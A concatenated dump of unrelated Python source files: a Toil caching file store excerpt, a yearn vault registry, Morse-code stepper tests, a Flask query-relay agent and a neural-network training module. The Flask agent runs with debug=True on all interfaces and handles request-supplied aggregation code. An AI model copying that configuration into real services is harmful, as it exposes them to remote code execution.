:rtype: bool
"""
# Work out who we are
pid = os.getpid()
# See if we actually own this file and can give it away
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?',
(fileStoreID, 'downloading', pid))
if self.cur.fetchone()[0] > 0:
# Now we have exclusive control of the cached copy of the file, so we can give it away.
# We are giving it away
shutil.move(cachedPath, localFilePath)
# Record that.
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))
self.cur.execute('DELETE FROM files WHERE id = ?', (fileStoreID,))
self.con.commit()
# Now we're done
return True
else:
# We don't own this file in 'downloading' state
return False
def _createLinkFromCache(self, cachedPath, localFilePath, symlink=True):
"""
Create a hardlink or symlink from the given path in the cache to the
given user-provided path. Destination must not exist.
Only creates a symlink if a hardlink cannot be created and symlink is
true.
If no link can be created, returns False. Otherwise, returns True.
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: True if a symlink is allowed, False otherwise.
:return: True if the file is successfully linked. False if the file cannot be linked.
:rtype: bool
"""
try:
# Try and make the hard link.
os.link(cachedPath, localFilePath)
return True
except OSError:
if symlink:
# Or symlink
try:
os.symlink(cachedPath, localFilePath)
return True
except OSError:
return False
else:
return False
def _readGlobalFileWithCache(self, fileStoreID, localFilePath, symlink, readerID):
"""
Read a file, putting it into the cache if possible.
:param toil.fileStores.FileID fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Now we know to use the cache, and that we don't require a mutable copy.
# Work out who we are
pid = os.getpid()
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists
logger.debug('Trying to make file record for id %s', fileStoreID)
self.cur.execute('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, fileStoreID.size, 'downloading', pid))
# Make sure to create a reference at the same time if it succeeds, to bill it against our job's space.
# Don't create the mutable reference yet because we might not necessarily be able to clear that space.
logger.debug('Trying to make file reference to %s', fileStoreID)
self.cur.execute('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND state = ? AND owner = ?',
(localFilePath, readerID, 'immutable', fileStoreID, 'downloading', pid))
self.con.commit()
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', pid))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file (and we have the reference)
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Try and make the link before we let the file go to cached state.
# If we fail we may end up having to give away the file we just downloaded.
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We made the link!
# Change file state from downloading to cached so other people can use it
self.cur.execute('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))
self.con.commit()
# Now we're done!
return localFilePath
else:
# We could not make a link. We need to make a copy.
# Change the reference to copying.
self.cur.execute('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('copying', localFilePath, fileStoreID))
self.con.commit()
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('Someone else is already responsible for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self.cur.execute('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'immutable', fileStoreID, 'cached', 'uploadable', 'uploading'))
self.con.commit()
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We managed to make the link
return localFilePath
else:
# We can't make the link. We need a copy instead.
# We could change the reference to copying, see if
# there's space, make the copy, try and get ahold of
# the file if there isn't space, and give it away, but
# we already have code for that for mutable downloads,
# so just clear the reference and download mutably.
self.cur.execute('DELETE FROM refs WHERE path = ? AND file_id = ?', (localFilePath, fileStoreID))
self.con.commit()
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
logger.debug('Could not obtain reference to file %s', fileStoreID)
# If we didn't get a download or a reference, adopt and do work from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.con)
self._stealWorkFromTheDead()
self._executePendingDeletions(self.con, self.cur)
def readGlobalFileStream(self, fileStoreID):
if not isinstance(fileStoreID, FileID):
# Don't let the user forge File IDs.
raise TypeError('Received file ID not of type FileID: {}'.format(fileStoreID))
if fileStoreID in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
# TODO: can we fulfil this from the cache if the file is in the cache?
# I think we can because if a job is keeping the file data on disk due to having it open, it must be paying for it itself.
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
if not isinstance(fileStoreID, FileID):
# Don't let the user forge File IDs.
raise TypeError('Received file ID not of type FileID: {}'.format(fileStoreID))
# What job are we operating as?
jobID = self.jobID
# What paths did we delete
deleted = []
# What's the first path, if any, that was missing? If we encounter a
# missing ref file, we will raise an error about it and stop deleting
# things.
missingFile = None
for row in self.cur.execute('SELECT path FROM refs WHERE file_id = ? AND job_id = ?', (fileStoreID, jobID)):
# Delete all the files that are references to this cached file (even mutable copies)
path = row[0]
if path.startswith(self.localTempDir):
# It is actually in the local temp dir where we are supposed to be deleting things
try:
os.remove(path)
except OSError as err:
if err.errno != errno.ENOENT:
# Something else went wrong
raise
# Otherwise, file is missing, but that's fine.
missingFile = path
break
deleted.append(path)
for path in deleted:
# Drop the references
self.cur.execute('DELETE FROM refs WHERE file_id = ? AND job_id = ? AND path = ?', (fileStoreID, jobID, path))
self.con.commit()
# Now space has been revoked from the cache because that job needs its space back.
# That might result in stuff having to be evicted.
self._freeUpSpace()
if missingFile is not None:
# Now throw an error about the file we couldn't find to delete, if
# any. TODO: Only users who know to call deleteLocalFile will ever
# see this. We also should check at the end of the job to make
# sure all the refs are intact.
raise IllegalDeletionCacheError(missingFile)
def deleteGlobalFile(self, fileStoreID):
if not isinstance(fileStoreID, FileID):
# Don't let the user forge File IDs.
raise TypeError('Received file ID not of type FileID: {}'.format(fileStoreID))
# Delete local copies for this job
self.deleteLocalFile(fileStoreID)
# Work out who we are
pid = os.getpid()
# Make sure nobody else has references to it
for row in self.cur.execute('SELECT job_id FROM refs WHERE file_id = ? AND state != ?', (fileStoreID, 'mutable')):
raise RuntimeError('Deleted file ID %s which is still in use by job %s' % (fileStoreID, row[0]))
# TODO: should we just let other jobs and the cache keep the file until
# it gets evicted, and only delete at the back end?
# Pop the file into deleting state owned by us if it exists
self.cur.execute('UPDATE files SET state = ?, owner = ? WHERE id = ?', ('deleting', pid, fileStoreID))
self.con.commit()
# Finish the delete if the file is present
self._executePendingDeletions(self.con, self.cur)
# Add the file to the list of files to be deleted from the job store
# once the run method completes.
self.filesToDelete.add(fileStoreID)
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
def exportFile(self, jobStoreFileID, dstUrl):
# First we need to make sure the file is actually in the job store if
# we have it cached and need to upload it.
# We don't have to worry about the case where a different process is
# uploading it because we aren't supposed to have the ID from them
# until they are done.
# For safety and simplicity, we just execute all pending uploads now.
self._executePendingUploads(self.con, self.cur)
# Then we let the job store export. TODO: let the export come from the
# cache? How would we write the URL?
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def waitForCommit(self):
# We need to block on the upload thread.
# We may be called even if startCommit is not called. In that
# case, a new instance of this class should have been created by the
# worker and ought to pick up all our work by PID via the database, and
# this instance doesn't actually have to commit.
if self.commitThread is not None:
self.commitThread.join()
return True
def startCommit(self, jobState=False):
# If we already started a commit (maybe with a different parameter
# value?) wait on it, so we can't forget to join it later.
self.waitForCommit()
# Start the commit thread
self.commitThread = threading.Thread(target=self.startCommitThread, args=(jobState,))
self.commitThread.start()
def startCommitThread(self, jobState):
"""
Run in a thread to actually commit the current job.
"""
# Make sure the previous job is committed, if any
if self.waitForPreviousCommit is not None:
self.waitForPreviousCommit()
try:
# Reconnect to the database from this thread. The main thread can
# keep using self.con and self.cur. We need to do this because
# SQLite objects are tied to a thread.
con = sqlite3.connect(self.dbPath)
cur = con.cursor()
logger.debug('Committing file uploads asynchronously')
# Finish all uploads
self._executePendingUploads(con, cur)
# Finish all deletions out of the cache (not from the job store)
self._executePendingDeletions(con, cur)
if jobState:
# Do all the things that make this job not redoable
logger.debug('Committing file deletes and job state changes asynchronously')
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The cache directory, containing cache state database.
Job local temp directories will be removed due to their appearance
in the database.
"""
# We don't have access to a class instance, nor do we have access to
# the workflow attempt number that we would need in order to find the
# right database. So we rely on this hard link to the most recent
# database.
dbPath = os.path.join(dir_, 'cache.db')
if os.path.exists(dbPath):
try:
# The database exists, see if we can open it
con = sqlite3.connect(dbPath)
except:
# Probably someone deleted it.
pass
else:
# We got a database connection
# Create the tables if they don't exist so deletion of dead
# jobs won't fail.
cls._ensureTables(con)
# Remove dead jobs
cls._removeDeadJobs(con)
con.close()
if os.path.exists(dir_) and os.path.isdir(dir_):
# Delete the state DB and everything cached.
robust_rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.waitForCommit()
@classmethod
def _removeDeadJobs(cls, con):
"""
Look at the state of all jobs registered in the database, and handle them
(clean up the disk)
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
# Work out our PID for taking ownership of jobs
pid = os.getpid()
# Get all the dead worker PIDs
workers = []
for row in cur.execute('SELECT DISTINCT worker FROM jobs WHERE worker IS NOT NULL'):
workers.append(row[0])
# Work out which of them are not currently running.
# TODO: account for PID reuse somehow.
deadWorkers = []
for worker in workers:
if not cls._pidExists(worker):
deadWorkers.append(worker)
# Now we know which workers are dead.
# Clear them off of the jobs they had.
for deadWorker in deadWorkers:
cur.execute('UPDATE jobs SET worker = NULL WHERE worker = ?', (deadWorker,))
con.commit()
if len(deadWorkers) > 0:
logger.debug('Reaped %d dead workers', len(deadWorkers))
while True:
# Find an unowned job.
# Don't take all of them; other people could come along and want to help us with the other jobs.
cur.execute('SELECT id FROM jobs WHERE worker IS NULL LIMIT 1')
row = cur.fetchone()
if row is None:
# We cleaned up all the jobs
break
jobID = row[0]
# Try to own this job
cur.execute('UPDATE jobs SET worker = ? WHERE id = ? AND worker IS NULL', (pid, jobID))
con.commit()
# See if we won the race
cur.execute('SELECT id, tempdir FROM jobs WHERE id = ? AND worker = ?', (jobID, pid))
row = cur.fetchone()
if row is None:
# We didn't win the race. Try another one.
continue
# If we did win, delete the job and its files and temp dir
cls._removeJob(con, cur, jobID)
logger.debug('Cleaned up orphaned job %s', jobID)
# Now we have cleaned up all the jobs that belonged to dead workers that were dead when we entered this function.
registry.py
import logging
import threading
import time
from typing import List
from brownie import Contract, chain, web3
from joblib import Parallel, delayed
from web3._utils.abi import filter_by_name
from web3._utils.events import construct_event_topic_set
from yearn.events import create_filter, decode_logs, get_logs_asap
from yearn.multicall2 import fetch_multicall
from yearn.prices import magic
from yearn.utils import Singleton, contract_creation_block, contract
from yearn.v2.vaults import Vault
from yearn.networks import Network
from yearn.exceptions import UnsupportedNetwork
from yearn.decorators import sentry_catch_all, wait_or_exit_before, wait_or_exit_after
logger = logging.getLogger(__name__)
class Registry(metaclass=Singleton):
def __init__(self, watch_events_forever=True):
self.releases = {} # api_version => template
self._vaults = {} # address -> Vault
self._experiments = {} # address => Vault
self.governance = None
self.tags = {}
self._watch_events_forever = watch_events_forever
self.registries = self.load_registry()
# load registry state in the background
self._done = threading.Event()
self._has_exception = False
self._thread = threading.Thread(target=self.watch_events, daemon=True)
self._thread.start()
def load_registry(self):
if chain.id == Network.Mainnet:
return self.load_from_ens()
elif chain.id == Network.Fantom:
return [contract('0x727fe1759430df13655ddb0731dE0D0FDE929b04')]
elif chain.id == Network.Arbitrum:
return [contract('0x3199437193625DCcD6F9C9e98BDf93582200Eb1f')]
else:
raise UnsupportedNetwork('yearn v2 is not available on this network')
def load_from_ens(self):
# track older registries to pull experiments
resolver = contract('0x4976fb03C32e5B8cfe2b6cCB31c09Ba78EBaBa41')
topics = construct_event_topic_set(
filter_by_name('AddressChanged', resolver.abi)[0],
web3.codec,
{'node': web3.ens.namehash('v2.registry.ychad.eth')},
)
events = decode_logs(get_logs_asap(str(resolver), topics))
logger.info('loaded %d registry versions', len(events))
return [Contract(event['newAddress']) for event in events]
@property
@wait_or_exit_before
def vaults(self) -> List[Vault]:
return list(self._vaults.values())
@property
@wait_or_exit_before
def experiments(self) -> List[Vault]:
return list(self._experiments.values())
@wait_or_exit_before
def __repr__(self) -> str:
return f"<Registry chain={chain.id} releases={len(self.releases)} vaults={len(self.vaults)} experiments={len(self.experiments)}>"
@wait_or_exit_after
def load_vaults(self):
if not self._thread._started.is_set():
self._thread.start()
@sentry_catch_all
def watch_events(self):
start = time.time()
self.log_filter = create_filter([str(addr) for addr in self.registries])
logs = self.log_filter.get_all_entries()
while True:
self.process_events(decode_logs(logs))
if not self._done.is_set():
self._done.set()
logger.info("loaded v2 registry in %.3fs", time.time() - start)
if not self._watch_events_forever:
return
time.sleep(300)
# read new logs at end of loop
logs = self.log_filter.get_new_entries()
def process_events(self, events):
for event in events:
logger.debug("%s %s %s", event.address, event.name, dict(event))
if event.name == "NewGovernance":
self.governance = event["governance"]
if event.name == "NewRelease":
self.releases[event["api_version"]] = contract(event["template"])
if event.name == "NewVault":
# experiment was endorsed
if event["vault"] in self._experiments:
vault = self._experiments.pop(event["vault"])
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("endorsed vault %s %s", vault.vault, vault.name)
# we already know this vault from another registry
elif event["vault"] not in self._vaults:
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("new vault %s %s", vault.vault, vault.name)
if event.name == "NewExperimentalVault":
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']} {event['vault'][:8]}"
self._experiments[event["vault"]] = vault
logger.debug("new experiment %s %s", vault.vault, vault.name)
if event.name == "VaultTagged":
self.tags[event["vault"]] = event["tag"]
def vault_from_event(self, event):
return Vault(
vault=Contract.from_abi("Vault", event["vault"], self.releases[event["api_version"]].abi),
token=event["token"],
api_version=event["api_version"],
registry=self,
watch_events_forever=self._watch_events_forever,
)
def load_strategies(self):
# stagger loading strategies to not run out of connections in the pool
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_strategies)() for vault in vaults)
def load_harvests(self):
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_harvests)() for vault in vaults)
def describe(self, block=None):
vaults = self.active_vaults_at(block)
results = Parallel(8, "threading")(delayed(vault.describe)(block=block) for vault in vaults)
return {vault.name: result for vault, result in zip(vaults, results)}
def total_value_at(self, block=None):
vaults = self.active_vaults_at(block)
prices = Parallel(8, "threading")(delayed(magic.get_price)(str(vault.token), block=block) for vault in vaults)
results = fetch_multicall(*[[vault.vault, "totalAssets"] for vault in vaults], block=block)
return {vault.name: assets * price / vault.scale for vault, assets, price in zip(vaults, results, prices)}
def active_vaults_at(self, block=None):
vaults = self.vaults + self.experiments
if block:
vaults = [vault for vault in vaults if contract_creation_block(str(vault.vault)) <= block]
# fixes edge case: a vault is not necessarily initialized on creation
activations = fetch_multicall(*[[vault.vault, 'activation'] for vault in vaults], block=block)
return [vault for vault, activation in zip(vaults, activations) if activation]
def wallets(self, block=None):
return set(vault.wallets(block) for vault in self.active_vaults_at(block))
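# --- Illustrative sketch (not part of the original module) -------------------
# The Registry above loads its state in a daemon thread and signals readiness
# through the `_done` threading.Event; the wait_or_exit_* decorators block
# callers until that event is set. The minimal class below shows the same
# "load in the background, block readers until ready" idea without any
# chain/web3 dependencies (all names here are illustrative only).
import threading
import time


class _BackgroundLoaded:
    def __init__(self):
        self._items = {}
        self._done = threading.Event()
        threading.Thread(target=self._load, daemon=True).start()

    def _load(self):
        time.sleep(0.1)              # stand-in for slow event-log scanning
        self._items = {'0xabc': 'vault'}
        self._done.set()             # signal that state is ready

    @property
    def items(self):
        self._done.wait()            # readers block until the loader finishes
        return dict(self._items)


if __name__ == '__main__':
    print(_BackgroundLoaded().items)  # waits ~0.1s, then prints {'0xabc': 'vault'}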
|
test_logics.py
|
# -*- coding: utf-8 -*-
import unittest
from unittest.mock import patch, MagicMock
from asterisk_mirror.logics import AsteriskLogic, MorseLogic, YearLogic
from asterisk_mirror.stepper import Stepper
import time
from threading import Thread
from datetime import datetime
class TestAsteriskLogic(unittest.TestCase):
def test_logic_execution(self):
stepper = Stepper()
logic = AsteriskLogic(stepper)
logic.execute = MagicMock()
thread = Thread(target=logic.run)
thread.start()
time.sleep(0.01)
logic.execute.assert_called()
stepper.interrupt()
class TestMorseLogic(unittest.TestCase):
# https://cryptii.com/morse-code-translator
test_morses = {
"SOS": "... --- ...",
"asterisk": ".- ... - . .-. .. ... -.-",
"1234567890": ".---- ..--- ...-- ....- ..... -.... --... ---.. ----. -----",
".,!?-/()&:;=+_\"@":
".-.-.- --..-- -.-.-- ..--.. -....- -..-. -.--. -.--.- .-... ---... -.-.-. -...- .-.-. ..--.- .-..-. .--.-.",
"The quick brown fox jumps over 13 lazy dogs.":
"- .... . / --.- ..- .. -.-. -.- / -... .-. --- .-- -. / ..-. --- -..- / .--- ..- -- .--. ... / --- ...- . .-. / .---- ...-- / .-.. .- --.. -.-- / -.. --- --. ... .-.-.-",
"h.o (hdoto) is an artist group based in Linz, Tokyo and Osaka.":
".... .-.-.- --- / -.--. .... -.. --- - --- -.--.- / .. ... / .- -. / .- .-. - .. ... - / --. .-. --- ..- .--. / -... .- ... . -.. / .. -. / .-.. .. -. --.. --..-- / - --- -.- -.-- --- / .- -. -.. / --- ... .- -.- .- .-.-.-"
}
def test_encode_morse(self):
for message, morse in self.test_morses.items():
logic = MorseLogic(Stepper())
logic.set_message(message)
assert logic.morse == morse
def test_execute(self):
def add_rotate_steps(rotate_steps:int, speed: float):
#print("steps: ", rotate_steps, flush=True)
self.rotate_steps += rotate_steps
def add_wait_duration(wait_duration:float):
#print("wait: ", wait_duration, flush=True)
self.wait_duration += wait_duration
with patch('asterisk_mirror.stepper.Stepper') as StepperMock:
stepper = StepperMock()
stepper.is_interrupted.return_value = False
stepper.rotate_by_steps.side_effect = add_rotate_steps
stepper.wait.side_effect = add_wait_duration
stepper.base_time = 0.001
for message, morse in self.test_morses.items():
self.rotate_steps = 0
self.wait_duration = 0
#print("message:", message)
logic = MorseLogic(stepper)
logic.set_message(message)
logic.execute()
# dot: 1, dash: 3, inter-elem: 1, inter-letters: 3, inter-words: 7
# steps = dot+dash*3
rotate_steps = (morse.count('.') + morse.count('-')*3) * logic.dot_steps
# wait_duration = dot*2 + dash*4 + space*2 + slash*4
duration = morse.count('.')*2 + morse.count('-')*4 + morse.count(' ')*2 + morse.count('/')*4 + 8
#print("wait:", self.wait_duration, ", steps:", self.rotate_steps)
#print("duration:", int(round(self.wait_duration/logic.dot_interval)+self.rotate_steps/logic.dot_steps), "->", duration)
assert self.rotate_steps == rotate_steps
assert int(round(self.wait_duration/logic.dot_interval)+rotate_steps/logic.dot_steps) == duration
class TestYearLogic(unittest.TestCase):
def _calc(self) -> int:
return 0
def test_20180602(self):
with patch('asterisk_mirror.stepper.Stepper') as StepperMock:
stepper = StepperMock()
logic = YearLogic(stepper, datetime(2018, 6, 2))
logic.execute()
# angle: 0.83286 (in units of 180 deg) -> 150 deg
# echo "scale=5; ( `date -ju 0602000018 +%s` - `date -ju 0101000018 +%s` ) / ( `date -ju 0101000019 +%s` - `date -ju 0101000018 +%s` ) * 2.0" | bc
args, _ = stepper.set_angle.call_args
# print("call_args:", args[0]*180)
assert round(args[0]*180) == 150
if __name__ == '__main__':
unittest.main()
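# --- Illustrative sketch (not part of the original tests) --------------------
# The comments in TestMorseLogic.test_execute use the standard Morse timing
# rules (dot = 1 unit, dash = 3, gap inside a letter = 1, between letters = 3,
# between words = 7). The helper below computes the total duration, in units,
# of a dot/dash string written the same way the test strings are: letters
# separated by spaces, words separated by " / ".
def morse_duration_units(morse: str) -> int:
    total = 0
    words = morse.split(' / ')
    for wi, word in enumerate(words):
        letters = word.split(' ')
        for li, letter in enumerate(letters):
            for si, symbol in enumerate(letter):
                total += 1 if symbol == '.' else 3   # dot or dash
                if si < len(letter) - 1:
                    total += 1                       # gap inside a letter
            if li < len(letters) - 1:
                total += 3                           # gap between letters
        if wi < len(words) - 1:
            total += 7                               # gap between words
    return total

# morse_duration_units('...') == 5 and morse_duration_units('... --- ...') == 27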
|
agent.py
|
#!/usr/bin/python
from flask import Flask
from flask import make_response
from flask import abort
from flask import request
from threading import Thread
from bson import json_util
import json
import sys
import os
import helperapi as helper
import confparser as cp
query_results = []
app = Flask(__name__)
@app.route('/')
def index():
return "Hello, World"
@app.route('/pathdump', methods=['POST'])
def getpathdumppost():
if not request.json or not 'api' in request.json:
abort (404)
else:
output = handleRequest (request.json)
return json.dumps (output, default=json_util.default)
@app.route('/pathdump', methods=['GET'])
def getpathdumpget():
if not request.json or not 'api' in request.json:
abort (404)
else:
output = handleRequest (request.json)
return json.dumps (output, default=json_util.default)
def handleRequest (req):
global query_results
Tree = req['tree']
cur = helper.getCurNodeID ()
if len (Tree[cur]['child']) == 0:
return helper.handleLeafNode (req)
# From now on, the following handles when the current node is a relay node
workers = []
# 1) create a worker thread at the current node
(func, argv) = helper.getThreadArgument (True, req)
t = Thread (target = helper.wrapper, args = (func, argv, query_results))
workers.append (t)
# 2) deliver query to child nodes
for child in Tree[cur]['child']:
(func, argv) = helper.getThreadArgument (False, req, child)
# further optimization (should be implemented): construct a subtree for
# each child and pass it on to the httpcmd as argument
t = Thread (target = helper.wrapper, args = (func, argv,
query_results))
workers.append (t)
# 3) start workers
for worker in workers:
worker.start()
# 4) wait until workers finish -> this part might hang forever
for worker in workers:
worker.join()
data=[]
for res in query_results:
if len(res) > 0 and type(res) == type(()) and 'content-type' in res[0]:
resp, content = res
content = json.loads (content, object_hook=json_util.object_hook)
else:
content = res
data += content
# reset variables
query_results = []
if req['api'] == 'execQuery' and 'aggcode' in req:
# 4) process collected data using AggCode
return helper.processCollectedData (req['aggcode'], data)
else:
return data
def initialize ():
options = None
if len (sys.argv) == 2:
options = cp.parse_config (sys.argv[1])
if options:
cp.options = options
print cp.options
# create app repository if it doesn't exist
if not os.path.exists (cp.options['repository']):
os.makedirs (cp.options['repository'])
if 'controller' not in cp.options:
sys.exit ("No controller IP address!")
if __name__ == '__main__':
initialize ()
app.run (debug = True, host = "0.0.0.0")
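# --- Illustrative sketch (not part of the original agent) --------------------
# handleRequest() above fans a query out by starting one worker thread for the
# local node plus one per child, letting every thread append its result to a
# shared list, and joining them all before aggregating. The helper below shows
# that fan-out/collect pattern on its own with a dummy work function; the names
# here are hypothetical and not part of the pathdump API.
def fan_out(work, inputs):
    results = []

    def run(item):
        results.append(work(item))   # list.append is thread-safe in CPython

    threads = [Thread(target=run, args=(item,)) for item in inputs]
    for t in threads:
        t.start()
    for t in threads:
        t.join()                     # like step 4) above, this can block forever
    return results

# Example: fan_out(lambda x: x * x, [1, 2, 3]) -> [1, 4, 9] (order may vary)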
|
function.py
|
import time
from lib.core.evaluate import ConfusionMatrix,SegmentationMetric
from lib.core.general import non_max_suppression,check_img_size,scale_coords,xyxy2xywh,xywh2xyxy,box_iou,coco80_to_coco91_class,plot_images,ap_per_class,output_to_target
from lib.utils.utils import time_synchronized
from lib.utils import plot_img_and_mask,plot_one_box,show_seg_result
import torch
from threading import Thread
import numpy as np
from PIL import Image
from torchvision import transforms
from pathlib import Path
import json
import random
import cv2
import os
import math
from torch.cuda import amp
from tqdm import tqdm
def train(cfg, train_loader, model, criterion, optimizer, scaler, epoch, num_batch, num_warmup,
writer_dict, logger, device, rank=-1):
"""
train for one epoch
Inputs:
- config: configurations
- train_loader: loader for training data
- model:
- criterion: (function) calculate all the loss, return total_loss, head_losses
- writer_dict:
outputs(3,)
output[0] len:3, [1,3,32,32,85], [1,3,16,16,85], [1,3,8,8,85]
output[1] len:1, [2,256,256]
output[2] len:1, [2,256,256]
target(3,)
target[0] [1,n,5]
target[1] [2,256,256]
target[2] [2,256,256]
Returns:
None
"""
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
# switch to train mode
model.train()
start = time.time()
for i, (input, target, paths, shapes) in enumerate(train_loader):
intermediate = time.time()
#print('tims:{}'.format(intermediate-start))
num_iter = i + num_batch * (epoch - 1)
if num_iter < num_warmup:
# warm up
lf = lambda x: ((1 + math.cos(x * math.pi / cfg.TRAIN.END_EPOCH)) / 2) * \
(1 - cfg.TRAIN.LRF) + cfg.TRAIN.LRF # cosine
xi = [0, num_warmup]
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(num_iter, xi, [cfg.TRAIN.WARMUP_BIASE_LR if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(num_iter, xi, [cfg.TRAIN.WARMUP_MOMENTUM, cfg.TRAIN.MOMENTUM])
data_time.update(time.time() - start)
if not cfg.DEBUG:
input = input.to(device, non_blocking=True)
assign_target = []
for tgt in target:
assign_target.append(tgt.to(device))
target = assign_target
with amp.autocast(enabled=device.type != 'cpu'):
outputs = model(input)
total_loss, head_losses = criterion(outputs, target, shapes,model)
# print(head_losses)
# compute gradient and do update step
optimizer.zero_grad()
scaler.scale(total_loss).backward()
scaler.step(optimizer)
scaler.update()
if rank in [-1, 0]:
# measure accuracy and record loss
losses.update(total_loss.item(), input.size(0))
# _, avg_acc, cnt, pred = accuracy(output.detach().cpu().numpy(),
# target.detach().cpu().numpy())
# acc.update(avg_acc, cnt)
# measure elapsed time
batch_time.update(time.time() - start)
end = time.time()
if i % cfg.PRINT_FREQ == 0:
msg = 'Epoch: [{0}][{1}/{2}]\t' \
'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\t' \
'Speed {speed:.1f} samples/s\t' \
'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\t' \
'Loss {loss.val:.5f} ({loss.avg:.5f})\t' \
'Lr {lr:.5f}'.format(
epoch, i, len(train_loader), batch_time=batch_time,
speed=input.size(0)/batch_time.val,
data_time=data_time, loss=losses, lr=optimizer.param_groups[0]['lr'])
logger.info(msg)
writer = writer_dict['writer']
global_steps = writer_dict['train_global_steps']
writer.add_scalar('train_loss', losses.val, global_steps)
# writer.add_scalar('train_acc', acc.val, global_steps)
writer_dict['train_global_steps'] = global_steps + 1
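# --- Illustrative sketch (not part of the original module) -------------------
# The warm-up block in train() ramps each parameter group's learning rate
# linearly with np.interp over the first num_warmup iterations (the bias group
# starts from WARMUP_BIASE_LR instead of 0.0, and the real code interpolates
# toward initial_lr * lf(epoch)). A minimal, self-contained version of that
# schedule with made-up numbers:
def _warmup_lr(num_iter, num_warmup=100, start_lr=0.0, target_lr=0.01):
    import numpy as np
    return float(np.interp(num_iter, [0, num_warmup], [start_lr, target_lr]))

# _warmup_lr(0) == 0.0, _warmup_lr(50) == 0.005, _warmup_lr(100) == 0.01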
def validate(epoch,config, val_loader, val_dataset, model, criterion, output_dir,
tb_log_dir, writer_dict=None, logger=None, device='cpu', rank=-1):
"""
validate for one epoch
Inputs:
- config: configurations
- val_loader: loader for validation data
- model:
- criterion: (function) calculate all the loss, return total_loss, head_losses
- writer_dict:
Return:
None
"""
# setting
max_stride = 32
weights = None
save_dir = output_dir + os.path.sep + 'visualization'
if not os.path.exists(save_dir):
os.mkdir(save_dir)
# print(save_dir)
_, imgsz = [check_img_size(x, s=max_stride) for x in config.MODEL.IMAGE_SIZE] #imgsz is multiple of max_stride
if type(config.GPUS) == type(1):
GPU_nums = 1
else:
GPU_nums = len(config.GPUS)
batch_size = config.TRAIN.BATCH_SIZE_PER_GPU * GPU_nums
test_batch_size = config.TEST.BATCH_SIZE_PER_GPU * GPU_nums
training = False
is_coco = False #is coco dataset
